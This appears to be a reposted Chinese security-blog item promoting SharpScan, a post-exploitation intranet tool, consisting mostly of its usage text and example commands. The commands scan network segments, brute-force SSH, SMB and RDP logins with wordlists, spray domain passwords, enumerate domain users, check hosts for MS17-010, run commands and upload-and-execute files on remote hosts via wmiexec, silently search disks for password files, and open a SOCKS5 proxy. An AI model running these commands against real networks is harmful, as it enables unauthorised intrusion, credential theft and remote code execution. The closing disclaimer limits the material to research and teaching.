1.工具特点
2. 主要功能
3.兼容性
Windows :支持win7-win11,windows server2008-2022
Linux:支持 glibc 2.17以上 的系统
MacOS: arm x64_x86,intel_x64_86(macOS 10.15以上)
4.使用
Usage: SharpScan [OPTIONS]Options: -i, --icmp Perform icmp scan -a, --arp Perform arp scan -U, --udp Perform udp scan -h, --hTarget=VALUE Target segment to scan -p, --ports=VALUE Ports to scan (e.g. "0-1024" or "80,443,8080") -u, --username=VALUE Username for authentication --pw, --password=VALUE Password for authentication --uf, --ufile=VALUE Username file for authentication --pwf, --pwdfile=VALUE Password file for authentication -m, --mode=VALUE Mode(e.g. ssh/smb/rdp/ftp/wmiexec/dcom/mysql/mssql/ userenum/passwordspray) -f, --func=VALUE wmiexc function(cmd/psh/upload/uploadexec) -c, --command=VALUE Command Execution -d, --delay=VALUE Scan delay(ms),Defalt:10ms -t, --thread=VALUE Maximum num of concurrent scans,Defalt:600 -s, --search=VALUE Search all files -l, --localfile=VALUE The local file to upload -r, --remotefile=VALUE The remote file path --socks5=VALUE Open socks5 port --http=VALUE Open SimpleHTTPServer port --folder=VALUE SimpleHTTPServer Folder --nopoc Not using proof of concept(POC) -o, --output=VALUE Output file to save console output --help, --show Show this usage and helpExample: SharpScan.exe -help SharpScan.exe -h 192.168.1.1/24 SharpScan.exe -h C:ip.txt SharpScan.exe -h 192.168.1.1,192.168.1.3,192.168.1.4 SharpScan.exe -h 192.168.1.107 -p 100-1024
4.1基本用法
扫描C段/B段,默认使用所有模块SharpScan.exe -h 192.168.1.1/24 (扫描C段)SharpScan.exe -h 192.168.1.1/16 (扫描B段)SharpScan.exe -h 192.168.1.107,192.168.1.3,192.168.1.4 (扫描指定IP,用逗号分隔)SharpScan.exe -h C:\Windows\IP.txt (扫描指定IP.txt,格式和账号密码本的格式一样)SharpScan.exe -h 192.168.1.107 -p 100-1024 (对单个IP进行端口扫描)
4.2其它功能
SharpScan.exe -h 192.168.244.1/24 -nopoc (只做网段主机探测和端口扫描)SharpScan.exe -s 192.168.244.169 -p 80-1024 -d 0 -m 600 (Tcp端口扫描:80-1024,0延时,最大并发600)SharpScan.exe -t 192.168.244.141 -U -p 100-10000 (udp端口扫描:100-10000,10ms延时,最大并发600)SharpScan.exe -h 192.168.244.1/24 -m ssh -u root -pw a (C段ssh服务账号密码爆破,账号root,密码a)SharpScan.exe -h 192.168.244.1/24 -m smb -u administrator -pw a (C段smb服务账号密码爆破,账号administrator,密码a)SharpScan.exe -h 192.168.244.1/24 -m rdp -u administrator -pw a (C段rdp服务账号密码爆破,账号administrator,密码a)SharpScan.exe -h 192.168.244.1/24 -m smb -uf user.txt -pwf pass.txt (用账号密码本爆破C段的smb服务)SharpScan.exe -h 192.168.244.1/24 -m rdp -uf user.txt -pwf pass.txt (用账号密码本爆破C段的rdp服务)SharpScan.exe -h 192.168.244.1/24 -m ssh -uf user.txt -pwf pass.txt (用账号密码本爆破C段的ssh服务()SharpScan.exe -h 192.168.244.1/24 -m ms17010 (C段批量扫描是否存在ms17010)SharpScan.exe -h 192.168.244.1/24 -m ssh -u root -pw a -c "uname-a" (ssh命令执行C段枚举)SharpScan.exe -h 192.168.244.1.3 -m wmiexec -f cmd -c "ls C:\Windows" (远程执行命令,通过注册表传递数据)SharpScan.exe -h 192.168.244.1.3 -m wmiexec -func upload -l C:a.exe -r C:\Windowsa.exe (上传文件到远程主机,-l是本地文件路径,-r是上传到远程主机的文件路径)SharpScan.exe -h 192.168.244.1.3 -m wmiexec -func uploadexec -l C:a.exe -r C:\Windowsa.exe (上传文件到远程主机并且执行文件)SharpScan.exe -h 192.168.244.1.3 -m userenum -uf user.txt (域内枚举用户名)SharpScan.exe -h 192.168.244.1.3 -m passwordspray -uf user.txt -pw abc123$% (域内密码喷洒)SharpScan.exe -h 192.168.244.1.3 -m passwordspray -uf user.txt -pwf pass.txt(域内密码喷洒)SharpScan.exe -s "pass.txt" (全盘静默检索pass.txt)SharpScan.exe -socks5 8000 -u test -pw 1234 (Socks5:8000,用户名:test,密码:1234)SharpScan.exe -h 192.168.244.1/24 -o output.txt (将扫描结果导出到output.txt)
4.3视频演示
🔄 获取链接
https://github.com/INotGreen/SharpScan
原文始发于微信公众号(不秃头的安全):工具分享 | 后渗透内网一键自动化+无文件落地扫描工具
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论